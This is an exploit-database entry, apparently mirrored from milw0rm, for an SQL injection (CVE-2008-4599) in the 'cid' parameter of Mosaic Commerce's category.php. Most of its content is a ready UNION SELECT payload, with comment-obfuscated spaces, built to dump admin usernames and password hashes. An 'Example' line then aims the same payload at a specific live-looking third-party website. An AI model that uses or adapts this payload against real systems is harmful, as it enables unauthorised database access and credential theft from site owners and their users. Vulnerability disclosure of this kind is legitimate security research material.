Mosaic Commerce - 'cid' SQL Injection



EKU-ID: 14639 CVE: OSVDB-49197;CVE-2008-4599 OSVDB-ID:
Author: Ali Abbasi Published: 2008-10-16 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


 Mosaic Commerce SQL Injection Vulnerability
Discovered By Ali Abbasi[abbasi[At]ustmb.ac.ir]
Mazandaran University Of Science And Technology
Network Security Research Center
Babol, Iran
http://cyber-defence.com
Greetz For All Persian Bugtraq Members ( www.bugtraq.ir )


  {SQL BUG}
  /mosaic-path/category.php?cid=[SQL]

  Exploit For Get Admin Username And Password Hash:
  category.php?cid=-12/**/union/**/select/**/1,concat(users_name,0x3a,users_password),3/**/from/**/users/*


Example:

http://www.coppermax.com/category.php?cid=-12/**/union/**/select/**/1,concat(users_name,0x3a,users_password),3/**/from/**/users/*

# milw0rm.com [2008-10-16]